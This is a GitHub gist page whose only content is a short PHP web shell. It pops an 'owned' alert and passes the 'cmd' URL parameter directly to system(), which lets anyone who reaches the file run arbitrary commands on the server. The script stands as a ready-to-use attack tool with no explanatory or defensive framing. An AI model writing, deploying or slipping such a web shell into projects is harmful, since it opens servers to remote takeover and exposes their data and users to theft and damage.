Skip to content

Instantly share code, notes, and snippets.

@onetwopunch
Created November 10, 2017 01:12
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save onetwopunch/0a6296b255359d242267a38994a853c2 to your computer and use it in GitHub Desktop.
Save onetwopunch/0a6296b255359d242267a38994a853c2 to your computer and use it in GitHub Desktop.
<?php
echo "<script>alert(U 4r3 0wn3d !!);</script>";
echo "Run command: ".htmlspecialchars($_GET['cmd']);
system($_GET['cmd']);
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment